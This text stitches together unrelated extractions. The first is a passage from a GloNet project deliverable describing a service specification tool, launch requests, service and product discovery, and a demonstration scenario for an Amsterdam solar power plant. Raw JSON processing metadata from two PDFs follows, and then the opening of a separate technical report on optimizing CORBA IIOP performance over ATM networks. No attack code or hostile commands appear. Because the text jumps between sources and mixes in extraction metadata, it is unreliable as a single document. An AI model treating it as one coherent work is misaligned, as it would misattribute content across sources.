There are several other aspects involved in specifying a service that can be defined through this interface. For instance, if a service is composed of other services (a so-called Composite service [13][14]), this fact can be indicated in its specification, under the New constituent Services. Once introduced, the names of constituting services also automatically appear in the specification of the composite service. Consider the example shown in Figure 10. Here, the user has introduced the three needed constituting atomic services for the “site maintenance” service, namely the “Check and Report”, “Wildlife Prevention” and the “Water Drainage”. Therefore, these three services also automatically appear (as in this figure) as a part of this service’s specification.
Please also note that for each of the constituting atomic services, the needed quantity of that service also needs to be specified. As the example shows, the above composite service needs to deploy the “Check and Report” service twice, imagining that it is needed once before the analysis of the damage and once afterward. Therefore, the user has indicated “Check and Report” with the quantity 2, “Wildlife Prevention” with the quantity 1, and the “Water Drainage” with quantity 1. But clearly more than the quantity, the proper specification of a composite service must accompany the specification of inter-connections among its constituting atomic services. For this purpose, a workflow or a BPMN diagram can be defined for the composite business service, representing the orchestration among its constituent services [7]. This aspect is supported by the integration between the PSS sub-system and the GloNet platform, as addressed in Section 2.3, and identified through the feature called Process Description in the composite service specification (see Figure 10). This feature is used to provide a reference to the desired workflow for composite business services. For this purpose, the service designer (current user) creates his/her intended workflow through the GloNet platform that provides a BPMN Modeler, and uploads it to the platform. The BPMN diagram for the
above composite business service example is presented in section C of Annex I, screenshot 1.16 (guideline scenario). Then through the PSS subsystem, when specifying composite services, the system provides a selection menu including the list of existing workflows owned by the user, to select from. As shown in figure 10, the designer can then choose his/her desired workflow, the “Site Cleaning-BP”, for the composite business service. Please also note the remove button option (black minus circle ) indicates that the feature is optional, i.e. it can be removed. For instance, constituting services for the composite service, can be added and/or removed, e.g. see figure 10, and its constituting services.

Finally, if the user wishes to add any other new features to a service specification, the New Feature can be specified at the bottom of the screen through the New Features section of the interface. The user will then need to indicate the feature-kind to which the feature corresponds. The example presented in Figure 11, indicates that the user has entered “Area” as the feature-kind for a new feature, which he/she has defined.
The user must then specify both the value and the unit for that feature. It is important to note that based on the feature-kind that the user selects/identifies for a new feature, the data-types for its value and unit will differ, according to those that are defined for the corresponding feature-kind. However, if the mentioned feature-kind is not already defined in the system; the user will then be immediately prompted with the window that asks him/her to first create that feature kind, before going further with the definition of the newly introduced feature. This is also explained with more details later on, in this section. At the last stage of this service specification process, the specification can be saved or discarded, through the two buttons that appear at the end bottom of this window.

4.2 Adding a new feature-kind
Every specified service through SST, is characterized by a set of features. Any identified feature in this sub-system requires that its feature-kind is defined prior to its use. To simplify users tasks, the user interface that supports definition/adding of new feature-kinds, as well as for enhancing the specification of already defined feature-kinds in this sub-system is supported through a pop-up window, as indicated in the “Create New Feature-Kind” form of Figure 12.
In order to add a new feature-kind, the user must first provide both a unique name for it as well as providing the domain or data type for the values of the features that instantiate this feature-kind. The user can further optionally indicate one or more possible units for the domain values specified for the feature-kind. Figure 12 shows the popup window of the create new feature-kind form, which can be triggered when defining the new service specification. At the last stage of the feature-kind specification process, the feature-kind can be either saved or discarded. When the definition of the feature-kind is saved, it gets automatically added to the missing field from the previous window that triggered it.
4.3 Adding a new unit
Within the Create New Feature-kind form, users can introduce a new unit (e.g. man-hour) for the features that instantiate a feature-kind, as indicated in Figure 12. The user is only required to enter a unique name for the new unit, and click on the corresponding plus sign (➕) for it, which appears in front of every unit input. These newly introduced units can then be associated for the features introduced through different feature-kinds. At the last stage of the unit specification process, the new introduced unit can be either saved or discarded.
4.4 Adding new classes
As discussed before, each service specification could be associated to one or more classes. As such, classes define the meta-data for services, and enable the Request for Launch process, which in turn indicate their set of feature-kinds that characterize them. To simplify users’ tasks, the user interface that supports definition/adding of new classes is also through a pop-up window, as indicated in the “Create New Class” form in Figure 13. To add a new class, the user must provide a unique name for that class. The user can then also add a set of obligatory feature-kinds to be associated with this class. Since this window is a pop-up window, it is triggered through other interface windows, and every time after saving a new class, the new class is automatically added to the missing field from the previous window.
4.5 Viewing / managing existing product specifications
Once services are specified, they can be viewed by selecting the “Existing Specifications” item under the service specification menu. As such, depending on the selected Design Group (as indicated in the upper right corner of the screen), their associated existing specification window will appear, showing the list of all relevant existing service specifications (sorted by their names), which the user is authorized to view. In other words, the specifications that are included in this window are all those related to the specified Design Group.
In the example of Figure 14, the “iPLON” user has selected/indicated the “Amsterdam PoP” Design Group. Consequently in this example, only the restricted service specifications that belong to this Design Group are shown. Please note while “iPLON ” might own only some of these restricted services, the other users in the design group might own some other specifications.
Other than viewing the service specifications, authorized users can also manage these specifications by preforming the following set of actions:
- **View** (Shown with the icon 📚) action, which takes the user to the view details of the service specification. Figure 15 shows an example of this view for the specification of “Analysis Natural Damage” as an atomic service.
- **Duplication** (Shown with the icon 🔄) action, which takes the user directly to a pre-filled “New Service” form. This simplifies the task of users, since in that form the specification information about the selected service is duplicated, which can then be edited by the user, thus defining a new similar service specification.
- **Hide** (Shown with the icon 🛡️) action, which allows hiding the corresponding service specification from the specific existing services window, which is restricted for the Design Group. For instance the user finds a service useless for him/her use and so the user hides this specification from his/her view.
- **Add to Directory** (Shown with the icon 📁) action which provides the possibility to assign an already defined service specification to which user has access, to an existing directory of the user. This is mainly to assist the user with organizing his/her service specification folders. This means that by default when specifying a service, if the user has not indicated a directory on the top right corner of the screen, the specification does not get assigned to any specific directory. However, when a directory is indicated on top right corner while specifying a service, then that service will be allocated to that directory. Nevertheless, through this action which is provided in the Existing Specification form, services may be assigned and reassigned to different directories.
- **Share with Design Group** (Shown with the icon 📏) action, which provides the user with the option to change the access rights/sharing status of a certain service specification that
he/she owns. The share options are available through existing services window, when the user clicks on its icon. Please note that when defining a new service specification, the access right to that specification is made private by default, that is if the user has not indicated a Design Group on the top right corner of the screen, otherwise the specification will become restricted to that Design Group by default. At any point in time, the owner of the service specification is allowed to broaden the access to that specification. This means that if a specification is private, then the owner can change it to restricted within a Design Group. But service specifications that are for instance restricted to a Design Group, their access cannot be reduced to private. In other words once the owner of a service specification grants certain access rights to others (to view the specification) he/she cannot withdraw that right later.
- **Request for Launch** (Shown with the icon 🔄) action, which enable the user to issue a request for launch of a service specification. This option is further explained in the next sub-section with more details.
4.6 Sending a Launch Request
When a designer completes the process of specifying an atomic/composite service (at any level of granularity), he/she may wish to initialize the process of realizing that service. For this purpose the SST supports the functionality of Launch Request (also referred to in this document in short as request) for starting this service realization process. As such, when and if a designer wishes that a certain service specification should be realized, he/she can announce this fact through building a request for it. For instance the designer of a service (check and report – see Figure 14), after specifying all its details, can build/make a launch request for this service, while providing its specification. In fact designers of innovative services are interested and curious to check if their

specifications can in fact be realized, meaning that they wish to know if their specifications are constructible and can materialize, and by which potential consortium of companies can it be done.
In order to build a launch request, the user can use the interface developed by the SST, as indicated in Figure 14, and labeled as the “Request for Launch” in the Existing Services form. Using this option, the user can send a new launch request for one of the already specified services. Please note that before a new Launch Request can be built for a service specification, the service must be first properly specified. Then through the interface presented in the Launch Request form, the user will identify a specified service (i.e. indicates its specification), to be included in the package for this request of launch.

Besides the identification of services, when defining and creating a launch request, also called packaging product/service specifications, it must be clear for which customer this design has been made. Moreover, the name of the complex product, for which this service is being launched, must be indicated so that the specification can be stored properly in the product portfolio.
In Figure 16, a service specification (e.g. “Check and Report”) is requested to be launched. The value of the “by” field of the package for this request would be indicated based on the user-name who is logged into the system (e.g. “iPLON”). The value of the “for” field of the request, is the customer name that is “City of Amsterdam” in this example. Finally, this specification later would be stored in the portfolio that belongs to the “Amsterdam Power Plant”.
.23
At the last stage of the launch request process, the request definition can be saved through the button at the bottom of the form.
### 4.7 PSDR- Discovering of Services
The menu item on the left column for Discover Service is located under the Product/Service Discovery (PSDR) menu item. It opens a form to discover services and to rank the matched suggestions based on the user query. This constitutes a part of the product/service discovery and recommendation engine of the general GloNet architecture. In fact, this part of the tool addresses our mechanisms for discovering and matchmaking between the users’ required criteria and the existing service specifications, in order to support the service designers with offering them the best-matched business services. As we described in [7], the ranking is done according to the similarity score that expresses approximate bi-simulation [15] between registered specification of each service and the users-submitted query. The discovery of most-fitting services can be done based on all the service specification features, including the service’s syntax, semantics, behavior and quality criteria aspects.
Figure 17 shows a screenshot of the Service Discovery form, where the user can select some of the service features as the criteria of the search, and then set his/her desired values for them.
Figure 17 – Service Discovery form
Figure 18 shows the result window of the matched services for the example query, which is represented in figure 17. The results are ranked by the calculated similarity scores of the registered services. The mechanism of the search and ranking suggestions is described in [7].
4.8 PSDR- Discovering of products
The link to Discover Product, which is located under Product/Service Discovery (PSDR) menu, opens a form to Discover Products and Rank of matched suggestions based on a user query. It constitutes as a part of the product / service discovery and recommendation engine of the general architecture. As we have already described in [7], the ranking is done based on the
Figure 19 shows a screenshot of the Product Discovery form, where the user can select some of the product features as the criteria of the search, and also indicate his/her desired values for them.
Figure 19 – Product Discovery form
Figure 20 shows the result window of the matched products for the example query, which is represented in figure 19. The mechanism of the search and ranking suggestions is described in [7].
Figure 20 – An example of Product Result window
5 CONCLUDING REMARKS
This report describes the prototype developed for the service specification Tool (SST) and Product/Service Discovery and Recommendation Engine (PSDR). It takes as the main input the specified design requirements and the introduced mechanisms for the dynamically customizable services enhancing complex products, as addressed in [7].
The advantage of the currently developed prototype reported in this document is that it is both generic and reusable for different domains (other VBEs) and not limited to the solar power plants and intelligent buildings domains. Moreover, these two tools (SST and PSDR) as well as the product specification tool (PST) have been integrated within the Product/Service Specification (PSS) sub-system of GloNet. The PSS sub-system is further integrated with the GloNet platform, the product portfolio, the VBE management, and the VO formation sub-systems.
Finally the developed PSS sub-system also serves as the base for other developments in WP5, namely for providing and packaging the needed input for the functionality as required for consortium formation and operation support.
6 REFERENCES
1. GloNet D1.1 deliverable – Detailed Requirements for GloNet use case and Domain Glossary
2. GloNet D1.2 deliverable – Detailed Requirements for GloNet use case and Domain Glossary
3. GloNet D2.1 deliverable – Required Information/Knowledge Provision Services Specification
4. GloNet D2.4 deliverable - Mechanisms for defining composed services to support collaboration
5. GloNet D4.1 deliverable - Design report on approach and mechanism for effective customized complex product specification
6. GloNet D4.2 deliverable - Prototype of Services supporting iterative complex product specification
7. GloNet D4.3 deliverable - Report on dynamically customizable services enhancing products
11. MySQL http://www.mysql.com
ANNEX I- AN EXAMPLE SCENARIO AS A GUIDELINE FOR THE PSS
A few notes upfront:
As a guideline for the usage of the PSS sub-system, this document briefly addresses a demonstration plan for version 3 of the PSS. Further to the guideline of PST demonstration in Deliverable 4.2, this Final version has some extra functions that are related to SST and PSDR. Also, in this demonstration we have over simplified the specification process at each stage due to time constraints. Please note that at each stage specifications are made gradually and threw an iterative process. Please also note that PST, SST and PSDR are equipped with “smart” autocomplete/suggestions for input fields.
A. Amsterdam solar power plant – PRE-PLC Stage
1. An EPC (iPLON) has received a tender for constructing a solar power plant in Amsterdam
2. In order to prepare bid, iPLON should first select its initial partners for the project for which it needs to evaluate and select the needed technologies.
3. This can only be achieved after a rough specification is made and the critical features of the complex product are identified.
4. So, iPLON opens the “add product” form by clicking on the add option in product specification (Click) (see screenshot I.1).
5. The first step for iPLON is to identify which high level classes of products this complex product falls under.
6. Let’s imagine that iPLON notices that a class (Power Plant) that is needed is not defined in the system. iPLON requests to add the new class by clicking on the plus button in front of the class field (see screenshot I.2).
7. This opens up a window for iPLON to specify a new class.
8. iPLON introduces a name for the class (i.e. Power Plant) and specifies the possible corresponding PROCOM code (power or C27.11.43) for the class. It can also specify a number of required features (Power Capacity) for the class and clicks add to save (see screenshot I.3 and I.4).
9. After saving, iPLON is guided back to the “add product” form so that it can continue with the specification.
10. Here, the just added class is introduced. iPLON can choose to introduce more classes or even removed the just specified and introduced class (Power Plant).
11. Each introduced class causes the system to ask for a set of obligatory features. So iPLON must fill in the value and units of the required features.
12. It’s important to note that the fields for the features are restricted to pre-defined conditions (e.g. pre-defined units).
13. iPLON can also specify features that are not mandated by the classes by introducing them using the new feature filed (see screenshot I.5 and I.6).


14. Let’s assume that at this point, iPLON identifies the need for a feature-kind that has not yet been introduced within the PST system (so no help is provided by autocomplete and a result it is not shown in the dropdown menu) it can add one by clicking the + button (see screenshot I.7).
15. This opens dialog for iPLON to specify the feature-kind, iPLON can specify the name, the type of the feature-kind and the possible units for the feature-kind (see screenshot I.8).
16. After clicking add, the system returns iPLON to the “add product” form again and this new feature-kind is introduced for the product specification.
17. At the end iPLON specifies the value and units of all features and clicks save.
18. At this point iPLON selects existing specifications in products and using the dropdown option beside the view button for a given specification finds more advanced functions that can be performed for the specification.
19. Here iPLON, clicks the “Request for launch” button to request a VO formation for the specified specification (see screenshot I.9 and I.10).
**Screenshot I.10**
---
**B. Amsterdam solar power plant – Design Stage**
1. After the EPC (iPLON) has been accepted for constructing a solar power plant in Amsterdam
2. In preparation for constructing the power plant iPLON (with the help of its initial partners) should first make the detailed design/specification of the power plant in order to select partners for the construction of the power plant.
3. iPLON starts this process by creating a design group, sharing the rough specification of the Amsterdam power plant and inviting the initial partners to help in the process of specifying the detailed specification.
4. All members of the Initial VO (Amsterdam Power Plant-Bid) constitute the members of a design group (called Amsterdam PP design)
5. At this stage some of the initial partners might ask other partners to join the design group(s) in order to contribute to the detailed specification.
6. If there is time I can show you how members are added later
7. iPLON Shares the initial designs with the Design group
8. **Please not that any user can also create a new design group independent of the VO in specific cases.**
9. After being part of the design group, each partner can view the design group he is a member of and can specify detailed specifications of sub-products and services required for the complex product (i.e. Amsterdam power plant) by reviewing the initial specification.
10. For example Prolon re-uses and customizes an existing specification of a sub-products (Pyranometer) for the Amsterdam power plant by duplicating it and shares it with the design group.
11. This also applies to services for example SKILL can specify a business service (wildlife prevention).
12. By clicking the add service option in service specification Skill can specifies an atomic business service (see screenshot I.11).
Screenshot I.11
13. After all partners have specified the sub-products and services, iPLON duplicates the previously defined complex product (see screenshot I.12).
Screenshot I.12
14. iPLON adds the newly defined/excising sub-produces and some features to the duplicate and renames it (see screenshot I.13 and I.14).
15. iPLON request a launch of the complex product (see screenshot I.15).
C. Amsterdam solar plant – O & M Stage
1. A partner involved in the power plant (SKILL) identifies the need for a new composed business service to support the power plant (Site maintenance).
2. In order to achieve this SKILL identifies the existing services it can use to implement the composite business service.
3. It first designs the process description (Workflow) using the GloNet BPMN modeler and uploads the workflow to the platform (see screenshot I.16).
4. Then it specifies the composite business service using the add service function.
5. Here it specifies a name for the service and adds the class “composite service” and other classes he finds relevant.
6. Then he adds the constituting services to the specification. And fills in the required features for composite services. One of these is business process, in this feature he selects the workflow he has uploaded previously from the menu (see screenshot I.17).
7. Finally after registering the service specification, it chooses the existing specifications and launches the service (see screenshot I.18).
CONSORTIUM
CAS Software AG, Germany
Project coordinator: Dr. Bernhard Koelmel
UNINOVA – Instituto de Desenvolvimento de Novas Tecnologias, Portugal
Technical coordinator: Prof. Luis M. Camarinha-Matos
Universiteit van Amsterdam, Netherlands
iPLON GmbH The Infranet Company, Germany
Steinbeis GmbH & Co., Germany
SKILL Estrategia S.L., Spain
Komix s.r.o., Czech Republic
Prolon Control Systems, Denmark
Member of the:
www.glonet-fines.eu
|
{"Source-Url": "https://pure.uva.nl/ws/files/47020744/710492.pdf", "len_cl100k_base": 10407, "olmocr-version": "0.1.53", "pdf-total-pages": 39, "total-fallback-pages": 0, "total-input-tokens": 63313, "total-output-tokens": 12349, "length": "2e13", "weborganizer": {"__label__adult": 0.00030350685119628906, "__label__art_design": 0.001544952392578125, "__label__crime_law": 0.0003314018249511719, "__label__education_jobs": 0.0019016265869140625, "__label__entertainment": 0.00011199712753295898, "__label__fashion_beauty": 0.00017726421356201172, "__label__finance_business": 0.00292205810546875, "__label__food_dining": 0.0003216266632080078, "__label__games": 0.0006189346313476562, "__label__hardware": 0.0018787384033203125, "__label__health": 0.0003070831298828125, "__label__history": 0.0004401206970214844, "__label__home_hobbies": 0.00013577938079833984, "__label__industrial": 0.0016021728515625, "__label__literature": 0.00025343894958496094, "__label__politics": 0.00029015541076660156, "__label__religion": 0.0004820823669433594, "__label__science_tech": 0.082763671875, "__label__social_life": 8.505582809448242e-05, "__label__software": 0.04302978515625, "__label__software_dev": 0.859375, "__label__sports_fitness": 0.0001779794692993164, "__label__transportation": 0.00070953369140625, "__label__travel": 0.00022912025451660156}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 53685, 0.03411]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 53685, 0.10333]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 53685, 0.90506]], "google_gemma-3-12b-it_contains_pii": [[0, 490, false], [490, 804, null], [804, 2837, null], [2837, 5605, null], [5605, 8176, null], [8176, 8847, null], [8847, 11820, null], [11820, 13394, null], [13394, 15065, null], [15065, 17105, null], [17105, 19339, null], [19339, 20653, null], [20653, 20748, null], [20748, 22122, null], [22122, 23306, null], [23306, 24288, null], [24288, 27639, null], [27639, 29011, null], [29011, 30197, null], [30197, 32876, null], [32876, 34698, null], [34698, 36690, null], [36690, 38762, null], [38762, 40495, null], [40495, 41844, null], [41844, 42558, null], [42558, 43179, null], [43179, 44314, null], [44314, 46171, null], [46171, 47746, null], [47746, 48090, null], [48090, 49142, null], [49142, 49564, null], [49564, 51527, null], [51527, 52089, null], [52089, 52162, null], [52162, 53096, null], [53096, 53239, null], [53239, 53685, null]], "google_gemma-3-12b-it_is_public_document": [[0, 490, true], [490, 804, null], [804, 2837, null], [2837, 5605, null], [5605, 8176, null], [8176, 8847, null], [8847, 11820, null], [11820, 13394, null], [13394, 15065, null], [15065, 17105, null], [17105, 19339, null], [19339, 20653, null], [20653, 20748, null], [20748, 22122, null], [22122, 23306, null], [23306, 24288, null], [24288, 27639, null], [27639, 29011, null], [29011, 30197, null], [30197, 32876, null], [32876, 34698, null], [34698, 36690, null], [36690, 38762, null], [38762, 40495, null], [40495, 41844, null], [41844, 42558, null], [42558, 43179, null], [43179, 44314, null], [44314, 46171, null], [46171, 47746, null], [47746, 48090, null], [48090, 49142, null], [49142, 49564, null], [49564, 51527, null], [51527, 52089, null], [52089, 52162, null], [52162, 53096, null], [53096, 53239, null], [53239, 53685, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 53685, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 53685, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 53685, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 53685, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 53685, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 53685, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 53685, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 53685, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 53685, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 53685, null]], "pdf_page_numbers": [[0, 490, 1], [490, 804, 2], [804, 2837, 3], [2837, 5605, 4], [5605, 8176, 5], [8176, 8847, 6], [8847, 11820, 7], [11820, 13394, 8], [13394, 15065, 9], [15065, 17105, 10], [17105, 19339, 11], [19339, 20653, 12], [20653, 20748, 13], [20748, 22122, 14], [22122, 23306, 15], [23306, 24288, 16], [24288, 27639, 17], [27639, 29011, 18], [29011, 30197, 19], [30197, 32876, 20], [32876, 34698, 21], [34698, 36690, 22], [36690, 38762, 23], [38762, 40495, 24], [40495, 41844, 25], [41844, 42558, 26], [42558, 43179, 27], [43179, 44314, 28], [44314, 46171, 29], [46171, 47746, 30], [47746, 48090, 31], [48090, 49142, 32], [49142, 49564, 33], [49564, 51527, 34], [51527, 52089, 35], [52089, 52162, 36], [52162, 53096, 37], [53096, 53239, 38], [53239, 53685, 39]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 53685, 0.03175]]}
|
olmocr_science_pdfs
|
2024-12-09
|
2024-12-09
|
4b95c6d4dbf4fab612047e2c9a04ed9b3b34a781
|
[REMOVED]
|
{"Source-Url": "http://i.stanford.edu/pub/cstr/reports/cs/tr/92/1446/CS-TR-92-1446.pdf", "len_cl100k_base": 12017, "olmocr-version": "0.1.53", "pdf-total-pages": 13, "total-fallback-pages": 0, "total-input-tokens": 57876, "total-output-tokens": 14712, "length": "2e13", "weborganizer": {"__label__adult": 0.00036025047302246094, "__label__art_design": 0.00037384033203125, "__label__crime_law": 0.0003943443298339844, "__label__education_jobs": 0.0015230178833007812, "__label__entertainment": 0.00012683868408203125, "__label__fashion_beauty": 0.0002007484436035156, "__label__finance_business": 0.000965595245361328, "__label__food_dining": 0.0003986358642578125, "__label__games": 0.0008835792541503906, "__label__hardware": 0.0017900466918945312, "__label__health": 0.000942707061767578, "__label__history": 0.0004982948303222656, "__label__home_hobbies": 0.00015437602996826172, "__label__industrial": 0.0007920265197753906, "__label__literature": 0.0004856586456298828, "__label__politics": 0.00032973289489746094, "__label__religion": 0.00054168701171875, "__label__science_tech": 0.367431640625, "__label__social_life": 0.00010985136032104492, "__label__software": 0.028228759765625, "__label__software_dev": 0.591796875, "__label__sports_fitness": 0.0002887248992919922, "__label__transportation": 0.0008807182312011719, "__label__travel": 0.0002491474151611328}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 54187, 0.02184]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 54187, 0.36018]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 54187, 0.89417]], "google_gemma-3-12b-it_contains_pii": [[0, 3200, false], [3200, 8393, null], [8393, 12819, null], [12819, 17955, null], [17955, 20457, null], [20457, 25361, null], [25361, 29180, null], [29180, 33194, null], [33194, 37350, null], [37350, 42000, null], [42000, 46788, null], [46788, 50786, null], [50786, 54187, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3200, true], [3200, 8393, null], [8393, 12819, null], [12819, 17955, null], [17955, 20457, null], [20457, 25361, null], [25361, 29180, null], [29180, 33194, null], [33194, 37350, null], [37350, 42000, null], [42000, 46788, null], [46788, 50786, null], [50786, 54187, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 54187, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 54187, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 54187, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 54187, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 54187, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 54187, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 54187, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 54187, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 54187, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 54187, null]], "pdf_page_numbers": [[0, 3200, 1], [3200, 8393, 2], [8393, 12819, 3], [12819, 17955, 4], [17955, 20457, 5], [20457, 25361, 6], [25361, 29180, 7], [29180, 33194, 8], [33194, 37350, 9], [37350, 42000, 10], [42000, 46788, 11], [46788, 50786, 12], [50786, 54187, 13]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 54187, 0.04844]]}
|
olmocr_science_pdfs
|
2024-12-07
|
2024-12-07
|
edea22121b2111521655a5789fea6ed2a974f733
|
Optimizing the Performance of the CORBA Internet Inter-ORB Protocol Over ATM
Authors: Aniruddha Gokhale and Douglas C. Schmidt
The Internet Inter-ORB Protocol (IIOP) enables heterogeneous CORBA-compliant Object Request Brokers (ORBs) to interoperate over TCP/IP networks. The IIOP uses the Common Data Representation (CDR) transfer syntax to map CORBA Interface Definition Language (IDL) data types into a bi-canonical wire format. Due to the excessive marshaling/demarshaling overhead, data copying, and high-levels of function call overhead, conventional implementation of IIOP protocols yield poor performance over high-speed networks.
To meet the demands of emerging distributed multimedia applications, CORBA-compliant ORBs must support both interoperable and highly efficient IIOP implementations. This paper provides two contributions to the study and design of high performance CORBA IIOP implementations. First, we precisely pinpoint the key sources of overhead in the SunSoft IIOP implementation (which is the standard reference implementation of IIOP written in C++) by measuring its performance for transferring richly-typed data over a high speed ATM network. Second, we empirically demonstrate the benefits that stem from systematically applying protocol optimizations to SunSoft IIOP. These optimizations include: optimizing for the expected case; eliminating obvious waste; replacing general purpose methods with specialized,... Read complete abstract on page 2.
Follow this and additional works at: http://openscholarship.wustl.edu/cse_research
Part of the Computer Engineering Commons, and the Computer Sciences Commons
Recommended Citation
http://openscholarship.wustl.edu/cse_research/427
Optimizing the Performance of the CORBA Internet Inter-ORB Protocol Over ATM
Complete Abstract:
The Internet Inter-ORB Protocol (IIOP) enables heterogeneous CORBA-compliant Object Request Brokers (ORBs) to interoperate over TCP/IP networks. The IIOP uses the Common Data Representation (CDR) transfer syntax to map CORBA Interface Definition Language (IDL) data types into a bi-canonical wire format. Due to the excessive marshaling/demarshaling overhead, data copying, and high-levels of function call overhead, conventional implementation of IIOP protocols yield poor performance over high-speed networks. To meet the demands of emerging distributed multimedia applications, CORBA-compliant ORBs must support both interoperable and highly efficient IIOP implementations. This paper provides two contributions to the study and design of high performance CORBA IIOP implementations. First, we precisely pinpoint the key sources of overhead in the SunSoft IIOP implementation (which is the standard reference implementation of IIOP written in C++) by measuring its performance for transferring richly-typed data over a high speed ATM network. Second, we empirically demonstrate the benefits that stem from systematically applying protocol optimizations to SunSoft IIOP. These optimizations include: optimizing for the expected case; eliminating obvious waste; replacing general purpose methods with specialized, efficient ones; precomputing values, if possible; storing redundant state to speed up expensive operations; and passing information between layers. The results of applying these optimization principles to SunSoft IIOP improved its performance 1.8 times for doubles, 3.3 times for longs, 3.75 times for shorts, 5 times for chars/octets, and 4.2 times for richly-typed structs over ATM networks. Our optimized implementation is now competitive with existing commercial ORBs using the static invocation interface (SII) and 2 to 4.5 times (depending on the data type) faster than commercial ORBs using the dynamic skeleton interface (DSI). Moreover, our optimizations are fully CORBA compliant and we maintain strict interoperability with other IIOP implementations such as Visigenic’s VisiBroker and IONA’s Orbix.
Optimizing the Performance of the CORBA Internet Inter-ORB Protocol Over ATM
Aniruddha Gokhale and Douglas C. Schmidt
WUCS-97-10
February 1997
Department of Computer Science
Washington University
Campus Box 1045
One Brookings Drive
St. Louis MO 63130
Optimizing the Performance of the CORBA
Internet Inter-ORB Protocol Over ATM
Aniruddha Gokhale and Douglas C. Schmidt
gokhale@cs.wustl.edu and schmidt@cs.wustl.edu
Department of Computer Science, Washington University
St. Louis, MO 63130, USA
This paper has been submitted for publication. It can be referenced as Washington University technical report #WUCS-97-10.
Abstract
The Internet Inter-ORB Protocol (IIOP) enables heterogeneous CORBA-compliant Object Request Brokers (ORBs) to interoperate over TCP/IP networks. The IIOP uses the Common Data Representation (CDR) transfer syntax to map CORBA Interface Definition Language (IDL) data types into a bi-canonical wire format. Due to the excessive marshaling/demarshaling overhead, data copying, and high-levels of function call overhead, conventional implementations of IIOP protocols yield poor performance over high speed networks. To meet the demands of emerging distributed multimedia applications, CORBA-compliant ORBs must support both interoperable and highly efficient IIOP implementations.
This paper provides two contributions to the study and design of high performance CORBA IIOP implementations. First, we precisely pinpoint the key sources of overhead in the SunSoft IIOP implementation (which is the standard reference implementation of IIOP written in C++) by measuring its performance for transferring richly-typed data over a high speed ATM network. Second, we empirically demonstrate the benefits that stem from systematically applying protocol optimizations to SunSoft IIOP. These optimizations include: optimizing for the expected case; eliminating obvious waste; replacing general purpose methods with specialized, efficient ones; precomputing values, if possible; storing redundant state to speed up expensive operations; and passing information between layers.
The results of applying these optimization principles to SunSoft IIOP improved its performance 1.8 times for doubles, 3.3 times for longs, 3.75 times for shorts, 5 times for chars/octets, and 4.2 times for richly-typed structures over ATM networks. Our optimized implementation is now competitive with existing commercial ORBs using the static invocation interface (SII) and 2 to 4.5 times (depending on the data type) faster than commercial ORBs using the dynamic skeleton interface (DSI). Moreover, our optimizations are fully CORBA compliant and we maintain strict interoperability with other IIOP implementations such as Visigenic’s VisiBroker and IONA’s Orbix.
Keywords: Distributed object computing, CORBA, IIOP, communication middleware protocol optimizations, high-speed networks.
1 Motivation
An increasingly important class of distributed applications require stringent quality of service (QoS) guarantees. These applications include telecommunication systems (e.g., call processing and switching), avionics control systems (e.g., operational flight programs for fighter aircraft), multimedia (e.g., video-on-demand and teleconferencing), and simulations (e.g., battle readiness planning). In addition to requiring QoS guarantees, these applications must be flexible and reusable.
The Common Object Request Broker Architecture (CORBA) is a distributed object computing middleware standard defined by the Object Management Group (OMG) [15]. CORBA is intended to support the production of flexible and reusable distributed services and applications. Many implementations of CORBA are now available.
The CORBA 2.0 specification requires Object Request Brokers (ORBs) to support a standard interoperability protocol. The CORBA specification defines an abstract interoperability protocol called the General Inter-ORB Protocol (GIOP). Specialized mappings of GIOP can be defined to operate over particular transport protocols. One such mapping is called the Internet Inter-ORB Protocol (IIOP), which is the emerging standard GIOP mapping for distributed object computing over TCP/IP. The latest release of Netscape integrates IIOP into its Web browser, making IIOP the most widely available protocol for interoperability between heterogeneous ORBS.
